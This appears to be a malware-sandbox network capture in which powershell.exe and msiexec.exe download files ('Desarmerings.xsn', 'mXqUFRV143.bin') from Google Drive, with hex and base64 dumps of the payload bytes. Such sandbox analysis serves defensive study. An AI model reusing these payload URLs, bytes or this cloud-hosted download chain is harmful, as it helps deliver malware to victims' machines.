                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                      Server: ESF
                                      Content-Length: 0
                                      X-XSS-Protection: 0
                                      X-Frame-Options: SAMEORIGIN
                                      X-Content-Type-Options: nosniff
                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                      Connection: close


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      1192.168.2.949707142.250.185.974437796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      TimestampBytes transferredDirectionData
                                      2024-10-01 05:46:44 UTC233OUTGET /download?id=16KUqaQ_X6zbBHAGNnsewuswUAZxtxGv7&export=download HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                      Host: drive.usercontent.google.com
                                      Connection: Keep-Alive
                                      2024-10-01 05:46:46 UTC4848INHTTP/1.1 200 OK
                                      Content-Type: application/octet-stream
                                      Content-Security-Policy: sandbox
                                      Content-Security-Policy: default-src 'none'
                                      Content-Security-Policy: frame-ancestors 'none'
                                      X-Content-Security-Policy: sandbox
                                      Cross-Origin-Opener-Policy: same-origin
                                      Cross-Origin-Embedder-Policy: require-corp
                                      Cross-Origin-Resource-Policy: same-site
                                      X-Content-Type-Options: nosniff
                                      Content-Disposition: attachment; filename="Desarmerings.xsn"
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Credentials: false
                                      Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                      Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                      Accept-Ranges: bytes
                                      Content-Length: 476220
                                      Last-Modified: Mon, 30 Sep 2024 07:24:24 GMT
                                      X-GUploader-UploadID: AD-8ljuJrbJ-a1KyGRe8aURo6DB85xJhcnaPGo9ac7osHG8Ze5x_iiKC3LL-Oxokqe4N4eo4Xw
                                      Date: Tue, 01 Oct 2024 05:46:46 GMT
                                      Expires: Tue, 01 Oct 2024 05:46:46 GMT
                                      Cache-Control: private, max-age=0
                                      X-Goog-Hash: crc32c=2nTycA==
                                      Server: UploadServer
                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                      Connection: close
                                      2024-10-01 05:46:46 UTC4848INData Raw: 63 51 47 62 63 51 47 62 75 31 72 50 44 51 44 72 41 73 71 4e 36 77 4a 6b 72 77 4e 63 4a 41 52 78 41 5a 74 78 41 5a 75 35 54 70 4f 77 37 75 73 43 66 68 2f 72 41 72 4a 32 67 65 6b 6a 55 66 6b 70 63 51 47 62 36 77 4a 54 49 49 48 42 31 62 31 49 4f 33 45 42 6d 2b 73 43 4d 7a 6a 72 41 6a 64 65 63 51 47 62 75 6c 44 68 6c 70 7a 72 41 70 68 4a 36 77 4b 6a 78 65 73 43 72 7a 37 72 41 6c 57 6a 4d 63 72 72 41 69 36 46 63 51 47 62 69 52 51 4c 63 51 47 62 36 77 4b 30 68 4e 48 69 36 77 4a 67 47 58 45 42 6d 34 50 42 42 48 45 42 6d 2b 73 43 42 70 61 42 2b 57 61 44 65 77 4e 38 79 6e 45 42 6d 33 45 42 6d 34 74 45 4a 41 52 78 41 5a 76 72 41 74 43 35 69 63 4e 78 41 5a 76 72 41 71 33 45 67 63 50 73 46 72 51 43 63 51 47 62 36 77 4a 6b 53 37 6f 6c 76 6e 57 56 36 77 4a 73 4e 33 45
                                      Data Ascii: cQGbcQGbu1rPDQDrAsqN6wJkrwNcJARxAZtxAZu5TpOw7usCfh/rArJ2gekjUfkpcQGb6wJTIIHB1b1IO3EBm+sCMzjrAjdecQGbulDhlpzrAphJ6wKjxesCrz7rAlWjMcrrAi6FcQGbiRQLcQGb6wK0hNHi6wJgGXEBm4PBBHEBm+sCBpaB+WaDewN8ynEBm3EBm4tEJARxAZvrAtC5icNxAZvrAq3EgcPsFrQCcQGb6wJkS7olvnWV6wJsN3E
                                      2024-10-01 05:46:46 UTC4848INData Raw: 57 61 4b 54 33 69 54 6c 77 73 49 65 78 6a 50 57 4c 70 65 2f 77 76 64 75 32 55 6c 2b 58 43 32 63 53 42 54 70 4c 51 75 74 47 7a 35 78 30 57 35 34 36 62 72 6f 36 78 67 77 45 65 2f 7a 66 4c 79 7a 2f 62 79 32 42 67 55 59 55 47 74 69 54 36 4f 70 70 33 6b 65 63 6d 72 30 33 47 45 56 72 6e 38 48 54 2b 76 62 57 36 69 57 72 31 42 4b 6c 41 4e 66 7a 73 77 75 72 4b 71 52 32 46 76 42 6c 72 6a 47 7a 70 61 76 58 38 36 57 72 31 2f 4f 6c 71 39 66 7a 70 61 76 58 38 36 57 72 31 39 77 6a 55 59 68 49 33 63 43 76 38 68 6b 36 46 76 77 2b 39 4e 56 6a 45 6c 30 59 34 2f 77 41 6d 4b 4c 2f 2f 50 65 4a 5a 37 6b 4f 32 69 5a 72 6b 6a 58 6c 71 39 66 7a 70 61 76 58 38 36 57 72 31 2f 4f 6c 71 39 66 7a 70 61 76 58 38 34 72 30 63 39 35 65 38 51 38 61 79 36 30 64 31 46 68 66 57 58 6c 71 2b 49
                                      Data Ascii: WaKT3iTlwsIexjPWLpe/wvdu2Ul+XC2cSBTpLQutGz5x0W546bro6xgwEe/zfLyz/by2BgUYUGtiT6Opp3kecmr03GEVrn8HT+vbW6iWr1BKlANfzswurKqR2FvBlrjGzpavX86Wr1/Olq9fzpavX86Wr19wjUYhI3cCv8hk6Fvw+9NVjEl0Y4/wAmKL//PeJZ7kO2iZrkjXlq9fzpavX86Wr1/Olq9fzpavX84r0c95e8Q8ay60d1FhfWXlq+I
                                      2024-10-01 05:46:46 UTC155INData Raw: 4e 2b 36 34 2b 63 73 45 59 32 52 35 73 63 76 79 45 65 62 48 55 4a 77 69 74 51 69 5a 4b 62 76 70 7a 30 41 75 71 41 2b 32 53 4e 31 50 65 58 58 68 4b 38 49 6d 57 46 31 2f 38 48 54 75 5a 67 57 72 71 68 57 36 6e 57 57 67 54 53 6a 75 67 79 43 44 41 6c 73 2b 59 4c 71 72 38 4e 52 7a 66 36 35 66 7a 76 36 4b 74 4d 2b 56 4c 6d 76 71 65 33 69 30 49 78 65 72 65 32 63 64 53 33 41 43 66 62 55 7a 41 64 79 72 6b 4f 72 77 53 6d 49 38 78 74 2b 4a 64 54 65 68 34 69 67 42 69 6d 35
                                      Data Ascii: N+64+csEY2R5scvyEebHUJwitQiZKbvpz0AuqA+2SN1PeXXhK8ImWF1/8HTuZgWrqhW6nWWgTSjugyCDAls+YLqr8NRzf65fzv6KtM+VLmvqe3i0Ixere2cdS3ACfbUzAdyrkOrwSmI8xt+JdTeh4igBim5
                                      2024-10-01 05:46:46 UTC1322INData Raw: 66 76 44 4f 30 54 35 4b 4c 39 50 6d 6e 54 67 31 30 55 74 49 6c 39 42 64 64 70 35 38 71 64 4e 34 4d 43 37 33 68 47 68 64 64 41 44 53 75 66 39 34 38 4d 6a 62 6a 71 42 2b 74 4a 51 47 5a 59 78 6e 50 53 65 4c 64 72 59 46 6f 37 42 68 32 4a 31 63 34 61 45 68 47 30 54 43 6f 37 30 51 4e 63 71 4f 5a 2f 2b 5a 33 4e 48 43 43 77 52 69 65 35 32 4f 55 48 7a 72 71 7a 35 61 76 44 6e 63 52 67 35 4b 65 46 31 35 76 72 70 50 36 33 6a 39 71 71 4a 6e 55 46 31 35 6c 64 45 76 57 33 67 38 5a 6f 48 4e 58 78 6a 50 57 4c 70 2b 6e 77 6b 70 58 32 6e 73 7a 44 53 4f 64 6d 53 43 68 76 72 37 43 73 79 45 77 46 55 2f 35 55 61 47 54 5a 32 53 31 43 47 31 77 51 79 36 6a 31 64 66 54 6f 46 6b 57 43 4b 6d 47 52 69 61 65 39 6d 50 33 32 78 33 50 4a 71 57 63 48 54 72 71 7a 35 61 76 43 48 45 52 4a 47
                                      Data Ascii: fvDO0T5KL9PmnTg10UtIl9Bddp58qdN4MC73hGhddADSuf948MjbjqB+tJQGZYxnPSeLdrYFo7Bh2J1c4aEhG0TCo70QNcqOZ/+Z3NHCCwRie52OUHzrqz5avDncRg5KeF15vrpP63j9qqJnUF15ldEvW3g8ZoHNXxjPWLp+nwkpX2nszDSOdmSChvr7CsyEwFU/5UaGTZ2S1CG1wQy6j1dfToFkWCKmGRiae9mP32x3PJqWcHTrqz5avCHERJG
                                      2024-10-01 05:46:46 UTC1390INData Raw: 63 63 58 58 75 53 69 38 78 72 65 50 33 54 33 6e 67 55 58 58 67 33 59 2b 4e 67 4e 55 68 39 4e 56 73 51 4c 6c 6f 2b 2b 67 48 43 50 30 46 31 64 52 42 73 74 72 74 62 43 43 6c 35 59 63 68 73 41 4d 43 45 6a 52 63 42 66 33 6a 51 41 71 42 4e 6c 42 55 70 69 39 74 53 4c 30 73 6c 51 43 61 61 76 58 38 36 57 72 31 2f 4f 6c 71 39 66 7a 70 61 76 58 38 36 57 72 31 2f 4f 6c 67 46 69 7a 52 49 59 6a 43 70 5a 46 49 33 46 78 68 63 42 45 57 6a 69 61 76 79 4f 51 49 48 37 78 67 39 4f 58 52 2b 6e 37 45 5a 49 67 36 74 6d 77 73 65 48 59 31 51 64 33 55 70 61 36 4a 45 42 32 4e 4c 58 32 41 54 38 69 4a 78 75 52 46 2b 57 31 69 35 6e 52 4f 79 35 45 37 74 52 4c 79 66 4b 4c 74 71 65 6e 79 2f 30 72 50 63 35 4c 71 37 66 4b 50 53 65 54 32 65 63 47 79 42 62 4c 71 34 31 48 53 50 38 52 34 63 6a
                                      Data Ascii: ccXXuSi8xreP3T3ngUXXg3Y+NgNUh9NVsQLlo++gHCP0F1dRBstrtbCCl5YchsAMCEjRcBf3jQAqBNlBUpi9tSL0slQCaavX86Wr1/Olq9fzpavX86Wr1/OlgFizRIYjCpZFI3FxhcBEWjiavyOQIH7xg9OXR+n7EZIg6tmwseHY1Qd3Upa6JEB2NLX2AT8iJxuRF+W1i5nROy5E7tRLyfKLtqeny/0rPc5Lq7fKPSeT2ecGyBbLq41HSP8R4cj
                                      2024-10-01 05:46:46 UTC1390INData Raw: 6b 38 4c 6e 66 63 75 63 34 6b 79 73 73 33 6f 6a 37 6b 34 47 64 35 38 49 6c 34 2f 55 67 30 66 30 65 56 74 50 32 79 33 4c 72 4f 39 32 76 73 53 2b 5a 79 4e 66 47 4a 4e 6f 62 6c 36 39 66 41 69 7a 43 33 72 75 76 69 67 6e 51 6a 45 6a 50 59 41 45 77 34 58 6b 72 34 4a 76 70 53 31 61 36 61 46 46 43 2b 6a 4c 78 52 50 46 5a 65 6e 55 65 2f 72 70 79 67 70 56 4b 34 4b 43 37 73 69 62 43 4a 4a 65 76 58 33 56 46 66 64 67 6a 6d 57 68 74 46 35 61 76 58 38 36 57 72 31 2f 4f 6c 71 39 66 7a 70 61 76 58 38 36 57 72 31 2f 4f 4b 6e 68 35 6c 4c 38 59 58 4d 43 52 33 62 68 6d 2f 30 6b 6b 42 68 56 6b 78 4d 49 34 34 34 4d 6a 61 79 36 73 58 66 51 71 78 70 34 75 2f 53 77 44 59 5a 71 6d 6f 39 54 6c 57 72 34 49 35 32 37 6a 6b 79 6f 65 77 37 74 71 6c 56 74 33 4a 6b 66 74 59 30 77 73 67 69
                                      Data Ascii: k8Lnfcuc4kyss3oj7k4Gd58Il4/Ug0f0eVtP2y3LrO92vsS+ZyNfGJNobl69fAizC3ruvignQjEjPYAEw4Xkr4JvpS1a6aFFC+jLxRPFZenUe/rpygpVK4KC7sibCJJevX3VFfdgjmWhtF5avX86Wr1/Olq9fzpavX86Wr1/OKnh5lL8YXMCR3bhm/0kkBhVkxMI444Mjay6sXfQqxp4u/SwDYZqmo9TlWr4I527jkyoew7tqlVt3JkftY0wsgi
                                      2024-10-01 05:46:46 UTC1390INData Raw: 6e 4e 4a 32 55 77 44 57 77 53 66 48 53 4c 4c 7a 35 61 76 6b 77 41 38 58 55 4f 50 63 4c 55 6e 78 71 30 4a 32 39 70 53 33 7a 37 54 30 70 61 71 58 53 74 37 38 2f 63 35 42 32 4a 44 79 72 4e 6f 52 78 4d 46 58 73 36 57 79 56 41 4a 6f 61 39 66 7a 70 61 76 58 38 36 57 72 31 2f 4f 6c 71 39 66 7a 70 61 76 58 38 36 57 44 53 6a 6f 45 4e 4d 6c 47 78 36 75 2f 4f 38 73 4c 4e 2b 65 56 6b 4d 62 38 38 64 38 4b 6f 73 66 64 77 2b 63 4c 46 6e 59 54 66 38 75 72 64 69 42 61 65 56 50 5a 4c 68 33 5a 58 63 75 6e 51 48 62 76 70 4a 48 72 50 70 6d 37 2f 70 65 6a 65 56 50 4c 42 37 37 4c 57 62 30 51 41 4c 69 49 56 4b 79 46 50 42 74 79 39 6b 65 2b 70 73 4a 79 63 64 66 61 6a 35 6a 53 62 76 45 66 36 34 35 71 4a 57 6f 39 64 52 4c 50 4b 35 66 7a 70 6d 76 54 74 6d 57 72 31 2f 4f 6c 71 39 66
                                      Data Ascii: nNJ2UwDWwSfHSLLz5avkwA8XUOPcLUnxq0J29pS3z7T0paqXSt78/c5B2JDyrNoRxMFXs6WyVAJoa9fzpavX86Wr1/Olq9fzpavX86WDSjoENMlGx6u/O8sLN+eVkMb88d8Kosfdw+cLFnYTf8urdiBaeVPZLh3ZXcunQHbvpJHrPpm7/pejeVPLB77LWb0QALiIVKyFPBty9ke+psJycdfaj5jSbvEf645qJWo9dRLPK5fzpmvTtmWr1/Olq9f
                                      2024-10-01 05:46:46 UTC1390INData Raw: 53 43 30 44 30 6f 46 73 4f 72 31 2f 4f 66 70 65 6b 4d 57 6b 6b 45 2b 71 65 4a 46 36 4f 48 36 37 6e 78 66 7a 44 41 35 38 76 78 79 4f 43 55 79 36 75 79 33 6a 6f 56 55 39 2f 56 43 6a 46 57 53 5a 75 4c 47 65 38 42 61 77 76 66 77 65 2f 56 32 77 65 68 72 4b 4b 69 67 79 4b 76 58 44 52 35 77 5a 30 37 75 68 59 41 71 30 6c 76 36 33 6f 73 66 5a 79 4e 77 2b 70 70 67 4b 59 69 4a 47 6a 41 4f 48 31 38 55 30 49 65 73 6e 36 6d 4a 36 55 31 6d 51 5a 2b 4f 70 42 54 57 6a 4a 37 6c 66 5a 71 66 78 38 7a 53 75 6d 39 4f 33 5a 62 4a 51 76 6c 76 6c 79 7a 72 76 45 51 38 47 58 74 61 37 4f 6c 71 39 66 7a 70 61 76 58 38 36 57 72 31 2f 4f 6c 71 39 66 7a 70 61 76 58 32 6c 4b 42 37 39 4b 38 2f 74 6e 4f 49 4d 65 62 7a 56 57 4e 48 66 39 43 4b 71 77 6b 70 4d 57 6e 63 61 57 2b 65 48 39 51 6a
                                      Data Ascii: SC0D0oFsOr1/OfpekMWkkE+qeJF6OH67nxfzDA58vxyOCUy6uy3joVU9/VCjFWSZuLGe8Bawvfwe/V2wehrKKigyKvXDR5wZ07uhYAq0lv63osfZyNw+ppgKYiJGjAOH18U0Iesn6mJ6U1mQZ+OpBTWjJ7lfZqfx8zSum9O3ZbJQvlvlyzrvEQ8GXta7Olq9fzpavX86Wr1/Olq9fzpavX2lKB79K8/tnOIMebzVWNHf9CKqwkpMWncaW+eH9Qj
                                      2024-10-01 05:46:46 UTC1390INData Raw: 71 39 66 7a 70 61 76 58 38 36 57 72 31 2f 4f 6c 71 39 66 7a 6a 61 52 46 35 6f 6e 7a 38 31 35 34 52 52 78 35 4b 31 59 43 79 47 45 42 48 33 54 57 57 4e 52 49 73 4f 79 65 72 33 33 5a 76 6b 6c 6d 4f 6d 64 6a 44 47 79 32 37 55 2b 56 79 67 6a 45 54 6a 7a 6d 52 30 53 59 38 79 57 72 77 35 33 2b 66 51 62 6b 78 64 75 67 51 72 2f 48 64 34 2f 78 55 57 55 59 78 64 75 32 51 65 6f 2b 39 34 2f 4d 6a 33 37 4f 4d 51 7a 31 69 79 58 70 63 4b 6f 72 33 41 69 79 30 6b 37 53 36 67 47 79 33 4c 73 73 39 79 63 50 4b 48 7a 34 46 47 65 67 54 74 66 36 6d 44 37 74 48 42 32 77 6b 42 5a 4d 68 50 43 68 68 5a 34 53 70 30 41 41 55 70 6f 39 64 6f 45 7a 79 62 61 61 5a 65 76 58 79 65 2b 72 6c 2f 4f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f
                                      Data Ascii: q9fzpavX86Wr1/Olq9fzjaRF5onz8154RRx5K1YCyGEBH3TWWNRIsOyer33ZvklmOmdjDGy27U+VygjETjzmR0SY8yWrw53+fQbkxdugQr/Hd4/xUWUYxdu2Qeo+94/Mj37OMQz1iyXpcKor3Aiy0k7S6gGy3Lss9ycPKHz4FGegTtf6mD7tHB2wkBZMhPChhZ4Sp0AAUpo9doEzybaaZevXye+rl/OAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAo
                                      2024-10-01 05:46:46 UTC1390INData Raw: 38 35 70 6d 50 6e 41 6f 6d 76 63 2b 73 4d 6a 6e 33 55 4e 31 49 50 65 44 5a 32 46 30 6b 4d 65 62 36 45 4b 43 46 42 6c 36 62 36 7a 6a 43 6f 2b 6b 77 6e 54 36 70 49 34 59 72 6c 35 51 54 64 51 42 50 56 51 6f 4d 42 6b 45 75 72 4c 79 43 37 53 50 42 6c 37 41 2f 7a 70 61 76 58 38 36 57 72 31 2f 4f 6c 71 39 66 7a 70 61 76 58 38 36 57 72 31 39 71 56 52 36 30 77 49 71 49 48 59 6a 2b 39 59 68 65 49 6d 73 66 74 78 64 45 36 70 6e 2b 77 67 78 46 43 36 74 64 7a 70 62 48 37 64 53 64 35 77 39 32 51 45 59 32 75 61 4f 46 51 37 64 6a 67 67 41 46 72 45 68 71 4a 75 46 35 78 55 65 65 56 6f 6e 62 45 6a 79 71 6f 2f 2f 66 75 38 6c 65 37 32 4a 42 67 71 42 33 72 52 6a 76 42 48 41 51 4d 34 36 59 57 79 65 46 52 6f 65 79 56 6b 42 30 47 35 4c 70 6f 67 45 39 7a 2f 41 6f 77 30 74 65 64 51
                                      Data Ascii: 85pmPnAomvc+sMjn3UN1IPeDZ2F0kMeb6EKCFBl6b6zjCo+kwnT6pI4Yrl5QTdQBPVQoMBkEurLyC7SPBl7A/zpavX86Wr1/Olq9fzpavX86Wr19qVR60wIqIHYj+9YheImsftxdE6pn+wgxFC6tdzpbH7dSd5w92QEY2uaOFQ7djggAFrEhqJuF5xUeeVonbEjyqo//fu8le72JBgqB3rRjvBHAQM46YWyeFRoeyVkB0G5LpogE9z/Aow0tedQ


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      2192.168.2.949709216.58.206.784437400C:\Windows\SysWOW64\msiexec.exe
                                      TimestampBytes transferredDirectionData
                                      2024-10-01 05:47:18 UTC216OUTGET /uc?export=download&id=16BcB-CnWtRtHDq7UA6aD9a4cHD2R7_Ck HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                      Host: drive.google.com
                                      Cache-Control: no-cache
                                      2024-10-01 05:47:18 UTC1610INHTTP/1.1 303 See Other
                                      Content-Type: application/binary
                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                      Pragma: no-cache
                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                      Date: Tue, 01 Oct 2024 05:47:18 GMT
                                      Location: https://drive.usercontent.google.com/download?id=16BcB-CnWtRtHDq7UA6aD9a4cHD2R7_Ck&export=download
                                      Strict-Transport-Security: max-age=31536000
                                      Cross-Origin-Opener-Policy: same-origin
                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                      Content-Security-Policy: script-src 'nonce-0jawIWtBlPcNmtC7fhTatA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                      Server: ESF
                                      Content-Length: 0
                                      X-XSS-Protection: 0
                                      X-Frame-Options: SAMEORIGIN
                                      X-Content-Type-Options: nosniff
                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                      Connection: close


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      3192.168.2.949710142.250.185.974437400C:\Windows\SysWOW64\msiexec.exe
                                      TimestampBytes transferredDirectionData
                                      2024-10-01 05:47:19 UTC258OUTGET /download?id=16BcB-CnWtRtHDq7UA6aD9a4cHD2R7_Ck&export=download HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                      Cache-Control: no-cache
                                      Host: drive.usercontent.google.com
                                      Connection: Keep-Alive
                                      2024-10-01 05:47:22 UTC4854INHTTP/1.1 200 OK
                                      Content-Type: application/octet-stream
                                      Content-Security-Policy: sandbox
                                      Content-Security-Policy: default-src 'none'
                                      Content-Security-Policy: frame-ancestors 'none'
                                      X-Content-Security-Policy: sandbox
                                      Cross-Origin-Opener-Policy: same-origin
                                      Cross-Origin-Embedder-Policy: require-corp
                                      Cross-Origin-Resource-Policy: same-site
                                      X-Content-Type-Options: nosniff
                                      Content-Disposition: attachment; filename="mXqUFRV143.bin"
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Credentials: false
                                      Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                      Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                      Accept-Ranges: bytes
                                      Content-Length: 494656
                                      Last-Modified: Mon, 30 Sep 2024 07:22:51 GMT
                                      X-GUploader-UploadID: AD-8ljunxwz52Xl0P2kDsknMUTRtBw4_OfWnClxS_ZJ1GEZ5yGCz6QHwDRr5_mAIFaqAmm3yDZxquzr-OQ
                                      Date: Tue, 01 Oct 2024 05:47:22 GMT
                                      Expires: Tue, 01 Oct 2024 05:47:22 GMT
                                      Cache-Control: private, max-age=0
                                      X-Goog-Hash: crc32c=7ODCIg==
                                      Server: UploadServer
                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                      Connection: close
                                      2024-10-01 05:47:22 UTC4854INData Raw: a2 11 42 98 b8 20 17 67 03 82 b8 34 34 bd 0a 30 4b bd 2f 1a 2c 3e ce 3b 42 7a 1b 01 63 e2 7e 09 63 a0 12 91 44 37 b6 12 a0 d9 46 d2 30 8f 59 dc c8 ad d3 d8 fe bb f8 01 c8 2f 60 14 55 2a be 5f f3 63 41 f6 3c f0 90 a2 ad f1 58 59 82 e9 4d a7 2c 83 eb 92 aa 3c 64 1f b3 a9 93 19 a6 e1 3d c0 8a b8 93 62 08 11 e3 69 f4 76 6b 4d 61 af 8f c0 c0 b7 0e d4 06 32 de 3c 48 44 7d 2d 62 a1 8c 23 30 a1 3e 7d 30 8c c5 14 77 7e 43 3d d0 26 ca ec 0d 24 4b 05 be fc 2f 51 a0 d5 34 6a 10 6e 31 00 db e0 ab 7b 66 8c 6f 34 35 f0 3b 1b fb d4 df 4f 31 d0 4b c7 fc cf 11 bd 1d 28 95 84 aa ad 23 c7 65 c4 7b 02 83 99 44 34 b7 f1 34 79 a7 a0 96 d0 0a 83 e3 78 08 59 4a d2 8b 4d 44 73 c4 52 62 bb 5a dc 45 ec 83 9a 91 b7 e8 c3 cf ad e9 f3 53 21 33 be 31 70 0b c0 63 8c 28 a7 75 41 9d fe 5f
                                      Data Ascii: B g440K/,>;Bzc~cD7F0Y/`U*_cA<XYM,<d=bivkMa2<HD}-b#0>}0w~C=&$K/Q4jn1{fo45;O1K(#e{D44yxYJMDsRbZES!31pc(uA_
                                      2024-10-01 05:47:22 UTC4854INData Raw: e8 cc b4 99 4d e0 72 0c 5c 5b dd 05 fa 98 25 32 35 42 9a b2 22 56 a1 7c 3d 8f 16 c6 04 7c 9c 44 87 d5 79 3f 19 cd 77 d9 2a df 70 dd 6b c5 f4 8e 18 2f 67 2a aa 6b da 4a f2 41 79 68 28 cb dc 88 8a 13 1c 7a c6 7a d7 bf 74 bf ca 3c 09 bd ea 61 c8 c9 dd 32 6b a3 e8 3c 76 75 a1 e1 57 71 22 08 bd cf 49 fd 69 8c 54 8e 21 db b9 5c 1e 1a 44 70 d6 cc 45 3f fb 85 13 ad ae dd 84 7c e8 70 cb d5 84 8b a1 5c 75 8d e2 ad 8c c2 b7 f5 da 07 61 79 8d 26 b3 89 93 34 af 0a fd 1b 0b d3 38 a7 2c ac a6 2f 68 42 cd 2c 7a 26 3c fa c6 75 48 8c 75 2e b2 8d 7f 6d 1b 79 21 ce 38 ad b0 b4 ff 30 6e 53 0d 1a b4 bc d5 62 c8 0d 12 8f 5f 43 e1 70 4d cc 3c bf 9b 00 b7 b4 a3 c7 25 cf 12 50 b4 f6 da fa 7e df 05 a4 61 d9 6c cc 5f 06 4e 58 a5 c3 93 ef 76 95 18 ea 27 84 4d 7c 5a 16 60 52 e1 f0 a0
                                      Data Ascii: Mr\[%25B"V|=|Dy?w*pk/g*kJAyh(zzt<a2k<vuWq"IiT!\DpE?|p\uay&48,/hB,z&<uHu.my!80nSb_CpM<%P~al_NXv'M|Z`R
                                      2024-10-01 05:47:22 UTC140INData Raw: d1 ce 7d 0d f6 70 42 18 d7 5d e3 8c 87 6d 1c a9 64 63 54 c8 fb 34 b3 4d 79 f7 c6 3a f4 91 67 94 4d 61 8a 5f 01 1f 22 80 15 c9 69 23 fe 0c 7a 0f 83 c0 d4 9e 4e 8b 06 ab ed bc 64 ae cf ee d2 21 31 02 4b 3e 4f 36 4d ce 99 4c 49 d6 c0 9d 16 65 23 e7 a0 23 8d b8 49 a8 d8 e9 8a b7 0a 9b 88 02 2b a9 27 7a bc bd fd 86 47 3a 32 5a 51 9a 3a f4 49 9f 87 a6 e6 4c 55 e7 9c f4 9f e0 81 51 16 93 96 74 ef 88 c8 6a 12 c8 94 ac bd 3c
                                      Data Ascii: }pB]mdcT4My:gMa_"i#zNd!1K>O6MLIe##I+'zG:2ZQ:ILUQtj<
